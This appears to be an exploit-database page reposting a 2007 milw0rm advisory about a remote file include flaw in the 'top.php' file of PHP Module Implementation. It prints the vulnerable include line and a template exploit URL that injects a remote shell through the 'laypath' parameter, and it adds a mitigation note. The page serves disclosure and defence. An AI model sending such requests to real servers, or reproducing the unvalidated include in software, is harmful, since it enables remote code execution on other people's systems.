header-logo
Suggest Exploit
vendor:
by:
GolD_M = [Mahmood_ali]
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PHP Module Implementation Remote File Include Vulnerability

The vulnerability allows an attacker to include remote files on the server by manipulating the 'laypath' parameter in the 'top.php' file. This can lead to remote code execution.

Mitigation:

The vulnerability can be mitigated by properly validating and sanitizing user input before including files. It is recommended to use absolute paths instead of user-controlled input.
Source

Exploit-DB raw data:

*********************************************************************
**********************************************************************
PHP Module Implementation(top.php laypath)Remote File Include Vul   ^
**********************************************************************
**********************************************************************
Downlaoad S : http://sourceforge.net/projects/phpmip/               ^
**********************************************************************
**********************************************************************
Author: GolD_M = [Mahmood_ali]  &&  Contact: HackEr_@W.Cn           ^
**********************************************************************
**********************************************************************
In:  /[path]/top.php                                                ^
**********************************************************************
**********************************************************************
Vulnerable Code:                                                    ^
**********************************************************************
**********************************************************************
include("$laypath/body.php");    Line : 23                          ^
**********************************************************************
**********************************************************************
Exploit:                                                            ^
**********************************************************************
**********************************************************************
http://Victim.Com/top.php?laypath=[Shell]                           ^
**********************************************************************
**********************************************************************

# milw0rm.com [2007-02-25]